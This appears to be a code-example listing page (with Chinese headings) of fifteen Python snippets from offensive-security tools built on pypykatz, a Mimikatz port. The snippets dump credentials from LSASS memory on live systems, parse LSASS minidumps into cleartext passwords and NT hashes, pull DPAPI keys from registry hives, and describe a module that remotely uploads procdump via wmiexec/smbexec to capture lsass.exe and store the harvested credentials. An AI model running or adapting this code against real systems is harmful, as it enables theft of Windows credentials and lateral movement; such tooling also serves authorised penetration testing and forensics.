示例1: __init__
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def __init__(self, timestamp_override = None, buildnumber = None):
"""
Timestamp override will change the msv_dll_timestamp value.
If None > no change
If 0 > it disables the ANIT_MIMIKATZ structs on certain builds
If 1 > it enforces to use the ANTI_MIMIKATZ structs on certain builds
"""
self.session = None
self.lsass_task = None
self.cc = None
self.task_as = None
self.cur_pos = None
self.modules = {}
self.timestamp_override = timestamp_override
#needed for pypykatz
self.processor_architecture = None
self.BuildNumber = buildnumber
self.msv_dll_timestamp = None #a special place in our hearts....
示例2: get_prekeys_form_registry_live
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_prekeys_form_registry_live(self):
    """
    Read the DPAPI pre-keys from the registry of the running system.

    Two access methods are attempted, the direct live-registry reader and
    the file-dump based offline parser; a failure of either is only logged
    at debug level.
    NOTE(review): the second method runs even when the first one succeeded,
    so its result wins when both succeed - confirm this is intended.

    return: tuple of two lists, [0] userkeys [1] machinekeys
    raises: Exception when neither method produced a registry object
    """
    from pypykatz.registry.live_parser import LiveRegistry
    from pypykatz.registry.offline_parser import OffineRegistry

    attempts = (
        (LiveRegistry.go_live, '[DPAPI] Failed to obtain registry secrets via direct registry reading method'),
        (OffineRegistry.from_live_system, '[DPAPI] Failed to obtain registry secrets via filedump method'),
    )
    registry = None
    for open_registry, failure_msg in attempts:
        try:
            registry = open_registry()
        except Exception:
            logger.debug(failure_msg)
    if registry is None:
        raise Exception('Registry parsing failed!')
    return self.__get_registry_secrets(registry)
示例3: get_prekeys_form_registry_files
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_prekeys_form_registry_files(self, system_path, security_path, sam_path = None):
    """
    Read the DPAPI pre-keys from registry hive files on disk.

    system_path: path to the SYSTEM hive
    security_path: path to the SECURITY hive
    sam_path: optional path to the SAM hive
    return: tuple of two lists, [0] userkeys [1] machinekeys
    raises: Exception when the hives could not be parsed (the underlying
        error is logged at error level first)
    """
    from pypykatz.registry.offline_parser import OffineRegistry

    registry = None
    try:
        registry = OffineRegistry.from_files(system_path, sam_path = sam_path, security_path = security_path)
    except Exception as err:
        logger.error('[DPAPI] Failed to obtain registry secrets via direct registry reading method. Reason: %s' %err)
    # Guard clause instead of if/else: no registry object means nothing to read.
    if registry is None:
        raise Exception('[DPAPI] Registry parsing failed!')
    return self.__get_registry_secrets(registry)
示例4: run_live
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def run_live(self, args):
    """
    Dump credentials from the live system and hand the outcome to
    self.process_results.

    Only args.module == 'lsa' is handled; for any other module value
    process_results is called with empty results.  When pypykatz.go_live()
    raises, the pseudo-filename 'live' is recorded in the error list and the
    exception is re-raised if args.halt_on_error is True, otherwise it is
    printed with a traceback.

    args: parsed command-line namespace (uses .module and .halt_on_error)
    """
    failed = []
    results = {}
    if args.module == 'lsa':
        label = 'live'
        try:
            results[label] = pypykatz.go_live()
        except Exception as err:
            failed.append(label)
            if args.halt_on_error == True:
                raise err
            print('Exception while dumping LSA credentials from memory.')
            traceback.print_exc()
    self.process_results(results, failed, args)
示例5: save_loot
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def save_loot(file, loot_id, encrypted=False):
    """
    Store an uploaded loot file and register it according to its type.

    file: the uploaded file object handed to save_file
    loot_id: identifier the stored artefact is registered under
    encrypted: passed through to save_file

    A "DMP" file is parsed with pypykatz and its logon sessions stored as
    JSON, "SYSINFO" is registered as system information, anything else is
    treated as a registry hive.  Only ImportError is handled here (logged as
    unmet dependencies); other errors propagate to the caller.
    """
    stored_path = save_file(file, dir=LOOT_DIR, encrypted=encrypted)
    kind = get_loot_type(stored_path)
    try:
        if kind == "DMP":
            _register_minidump(loot_id, stored_path)
        elif kind == "SYSINFO":
            add_sysinfo(loot_id, stored_path)
        else:
            # everything else is a registry hive
            add_hive(loot_id, kind, stored_path)
    except ImportError as err:
        log.error("You have unmet dependencies, loot could not be processed")
        log.exception(err)


def _register_minidump(loot_id, path):
    """Parse a minidump with pypykatz and store its logon sessions as JSON."""
    # Imported lazily so a missing pypykatz surfaces as ImportError in save_loot.
    from pypykatz.pypykatz import pypykatz
    parsed = pypykatz.parse_minidump_file(path)
    sessions = [json.loads(entry.to_json()) for entry in parsed.logon_sessions.values()]
    store_minidump(loot_id, json.dumps(sessions), path)
示例6: parse
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def parse(self):
    """
    Parse the minidump held in self._dumpfile with pypykatz and collect the
    credentials of every logon session into self._credentials.

    The dump file is closed as soon as pypykatz has read it.  Each entry is
    (ssp, domain, username, password, LMHash, NThash, SHAHash) with the
    hashes hex-encoded.  With self._raw set every entry is kept (as a list);
    otherwise entries with no secret at all, no username, an empty username
    or a machine account (username ending in '$') are dropped and the entry
    is stored as a tuple.

    return: RetCode(ERROR_SUCCESS)
    """
    pypy_parse = pypykatz.parse_minidump_external(self._dumpfile)
    self._dumpfile.close()
    # SSP attribute names looked up on each logon session; a session that
    # lacks one yields nothing for it (getattr default of []).
    ssps = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'kerberos_creds', 'credman_creds', 'tspkg_creds']
    for luid in pypy_parse.logon_sessions:
        for ssp in ssps:
            for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []):
                domain = getattr(cred, "domainname", None)
                username = getattr(cred, "username", None)
                password = getattr(cred, "password", None)
                LMHash = getattr(cred, "LMHash", None)
                NThash = getattr(cred, "NThash", None)
                SHAHash = getattr(cred, "SHAHash", None)
                # Hash fields are hex-encoded when present (assumed to be
                # bytes-like, since .hex() is called on them).
                if LMHash is not None:
                    LMHash = LMHash.hex()
                if NThash is not None:
                    NThash = NThash.hex()
                if SHAHash is not None:
                    SHAHash = SHAHash.hex()
                # Remove empty password, machine accounts and buggy entries
                if self._raw:
                    # Raw mode keeps every entry, stored as a list (filtered
                    # entries below are tuples).
                    self._credentials.append([ssp, domain, username, password, LMHash, NThash, SHAHash])
                elif (not all(v is None or v == '' for v in [password, LMHash, NThash, SHAHash])
                        and username is not None
                        and not username.endswith('$')
                        and not username == ''):
                    self._credentials.append((ssp, domain, username, password, LMHash, NThash, SHAHash))
    return RetCode(ERROR_SUCCESS)
示例7: get_by_pypykatz
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
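def get_by_pypykatz(self):
    """
    Collect credentials from the running system via pypykatz.go_live() and
    pass the result to self._extract_from_dump.

    return: the dict produced by _extract_from_dump, or an empty dict when
        pypykatz raised (this is a best-effort collection method, so the
        error is deliberately swallowed)
    """
    try:
        mimi = pypykatz.go_live()
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt / SystemExit
        # propagate instead of being turned into an empty result.
        return {}
    return self._extract_from_dump(mimi, 'pypykatz')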
示例8: get_by_procdump
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
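def get_by_procdump(self):
    """
    Parse the minidump at self.file_dump with pypykatz and pass the result to
    self._extract_from_dump.

    return: the dict produced by _extract_from_dump, or an empty dict when
        parsing raised (best-effort, mirrors get_by_pypykatz)
    """
    try:
        mimi = pypykatz.parse_minidump_file(self.file_dump)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt / SystemExit
        # propagate instead of being turned into an empty result.
        return {}
    return self._extract_from_dump(mimi, 'procdump')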
示例9: handle
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def handle(self, soc, addr):
    """
    Serve one connected client: drive the remote reader over the socket,
    queue the parsed result on self.resultQ and send the client an END command.

    soc: accepted socket for this client (not closed here; presumably the
        caller owns its lifetime - confirm)
    addr: (host, port) of the peer; only used to label the queued result
    """
    peer_addr = '%s:%s' % addr
    mimi = None
    transport = SocketTransport(soc)
    reader = RemoteReader(transport)
    try:
        print('[+] Handling client...')
        sysinfo = reader.setup()
        mimi = pypykatz(reader, sysinfo)
        mimi.start()
        self.resultQ.put((mimi, peer_addr))
        cmd = PYPYCMD()
        cmd.cmdtype = PYPYCMDType.END
        if self.send_results == True:
            # Echo the parsed sessions back to the client: str() of every
            # logon session concatenated into a single encoded parameter.
            data = ""
            for luid in mimi.logon_sessions:
                data += str(mimi.logon_sessions[luid])
            cmd.params.append(data.encode())
        transport.send(cmd)
        print('[+] Client finished!')
    except Exception as e:
        traceback.print_exc()
        # Keep whatever sessions were parsed before the failure.
        # NOTE(review): if the failure happened after the put() on the success
        # path (e.g. inside transport.send), the same mimi object is queued a
        # second time here; the consumer of resultQ should tolerate duplicates.
        if mimi and len(mimi.logon_sessions) > 0:
            self.resultQ.put((mimi, peer_addr))
        # Best-effort END to the client; the transport may already be broken,
        # so a failure here is ignored.
        try:
            cmd = PYPYCMD()
            cmd.cmdtype = PYPYCMDType.END
            transport.send(cmd)
        except:
            pass
        return
示例10: from_memory_file
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def from_memory_file(memory_file, timestamp_override = None, buildnumber = None):
    """
    Open a memory image with Rekall and wrap the session in a RekallReader.

    memory_file: path of the memory image
    timestamp_override: forwarded to RekallReader.from_session
    buildnumber: forwarded to RekallReader.from_session
    return: whatever RekallReader.from_session returns
    """
    logging.info('Invoking recall on file %s' % memory_file)
    session_options = dict(
        filename = memory_file,
        autodetect=['rsds', 'pe', 'windows_kernel_file'],
        logger = logging.getLogger('pypykatz'),
        autodetect_build_local = 'full',
        autodetect_scan_length=10*1024*1024*1024,
        # NOTE(review): the second profile source is plain HTTP, so profiles
        # fetched from it are not integrity-protected in transit.
        profile_path=["https://github.com/google/rekall-profiles/raw/master", "http://profiles.rekall-forensic.com"],
    )
    rsession = session.Session(**session_options)
    return RekallReader.from_session(rsession, timestamp_override, buildnumber)
示例11: __get_registry_secrets
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def __get_registry_secrets(self, lr):
    """
    Gets the pre-keys from an already parsed OffineRegistry or LiveRegistry object,
    populates the userkey/machinekey lists, returns the obtained keys.

    lr: OffineRegistry or LiveRegistry object
    return: tuple of two lists, [0] userkeys [1] machinekeys

    Side effects: the LSA DPAPI keys are also appended to self.user_keys and
    self.machine_keys; the keys derived from SAM NT hashes are only returned,
    not stored on self.
    """
    user = []
    machine = []
    from pypykatz.registry.security.common import LSASecretDPAPI
    if lr.security:
        for secret in lr.security.cached_secrets:
            if isinstance(secret, LSASecretDPAPI):
                # NOTE(review): these debug messages write the key material
                # itself into the log; the log file needs the same protection
                # as the keys.
                logger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)
                logger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)
                self.user_keys.append(secret.user_key)
                user.append(secret.user_key)
                self.machine_keys.append(secret.machine_key)
                machine.append(secret.machine_key)
    if lr.sam is not None:
        for secret in lr.sam.secrets:
            if secret.nt_hash:
                # Derive the per-user pre-keys from the account's NT hash; the
                # first value returned by get_prekeys_from_password is unused here.
                sid = '%s-%s' % (lr.sam.machine_sid, secret.rid)
                x, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)
                logger.debug('[DPAPI] NT hash method. Calculated user key for user %s! Key2: %s Key3: %s' % (sid, key2, key3))
                user.append(key2)
                user.append(key3)
                continue  # no-op: already the last statement of the loop body
    return user, machine
示例12: get_masterkeys_from_lsass_dump
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def get_masterkeys_from_lsass_dump(self, file_path):
    """
    Parse the minidump of an LSASS process and collect the DPAPI masterkeys it
    holds into self.masterkeys.

    file_path: path to the minidump file
    return: self.masterkeys, a dictionary of guid -> key bytes (entries from
        earlier calls are kept; this call only adds to it)
    """
    from pypykatz.pypykatz import pypykatz

    parsed = pypykatz.parse_minidump_file(file_path)
    for logon_session in parsed.logon_sessions.values():
        for entry in logon_session.dpapi_creds:
            logger.debug('[DPAPI] Got masterkey for GUID %s via minidump LSASS method' % entry.key_guid)
            # masterkey is stored hex-encoded in the dump; keep it as raw bytes.
            self.masterkeys[entry.key_guid] = bytes.fromhex(entry.masterkey)
    return self.masterkeys
示例13: __init__
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def __init__(self):
self.name = 'procdump'
self.description = 'Uploads procdump.exe to system, captures lsass.exe, downloads & reads output locally using pypykatz'
self.author = ['@m8r0wn']
self.requires_admin = True
self.exec_methods = ['wmiexec', 'smbexec']
self.args = {}
示例14: verify_remoteFile
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
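def verify_remoteFile(self, filename):
    """
    Check whether a file named *filename* exists in self.path on self.share.

    filename: name to look for; compared case-insensitively against the long
        name of every directory entry
    return: True when an entry matches, False otherwise
    """
    wanted = filename.lower()
    for entry in self.smb_con.list_path(self.share, self.path + "*"):
        long_name = entry.get_longname()
        # The long name may arrive as bytes or as str depending on the SMB
        # library; decode only when it is bytes.  Catching just these two
        # errors (instead of a bare except) lets KeyboardInterrupt and any
        # unrelated failure propagate.
        try:
            dir_file = long_name.decode('UTF-8')
        except (AttributeError, UnicodeDecodeError):
            dir_file = long_name
        if dir_file.lower() == wanted:
            return True
    # The original tracked an always-False `found` flag; returning False
    # directly is equivalent.
    return False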
##########################
# pypykatz dump parser
##########################
示例15: parsedump
# 需要导入模块: from pypykatz.pypykatz import pypykatz [as 别名]
# 或者: from pypykatz.pypykatz.pypykatz import pypykatz [as 别名]
def parsedump(self, loggers, smb_con, dumpfile):
    """
    Parse a downloaded LSASS minidump with pypykatz and record the recovered
    credentials in the database.

    loggers: dict of loggers; only loggers['console'] is used
    smb_con: connection object providing .db (update_user), .host and .ip
    dumpfile: path of the minidump to parse
    """
    # Modified from:
    # https://github.com/awsmhacks/CrackMapExtreme/blob/a3a0ca13014b88dd2feb6db2ac522e2573321d6c/cmx/protocols/smb.py
    # & Inspiration by @HackAndDo aka Pixis for these parse bits
    # Minimal argument namespace that LSACMDHelper.process_results expects.
    arg = Namespace(outfile = False,
                    json = False,
                    grep = False,
                    kerberos_dir = False,
                    recursive = False,
                    directory = False)
    out = pypykatz.parse_minidump_file(dumpfile)
    f = io.StringIO()
    with redirect_stdout(f): # Hides output
        # process_results prints its report; capture it so parse_output can
        # read it back instead of it going to the real stdout.
        LSACMDHelper().process_results({"dumpfile": out}, [], arg)
    logger = loggers['console']
    db_updates = 0
    for cred in self.parse_output(f.getvalue()):
        # A cleartext password takes precedence over a hash; each hit is
        # stored in the database and echoed to the console logger.
        # NOTE(review): passwords and hashes are written verbatim to the
        # console log and the database; both need the same protection as
        # the dump file itself.
        if cred['Password']:
            smb_con.db.update_user(cred['Username'], cred['Password'], cred['Domain'], '')
            logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Password'])])
            db_updates += 1
        elif cred['Hash']:
            smb_con.db.update_user(cred['Username'], '', cred['Domain'], cred['Hash'])
            logger.success([smb_con.host, smb_con.ip, self.name.upper(), "{}\\{}:{}".format(cred['Domain'], cred['Username'], cred['Hash'])])
            db_updates += 1
    logger.info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
    logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Dmp file saved to: {}".format(self.local_output)])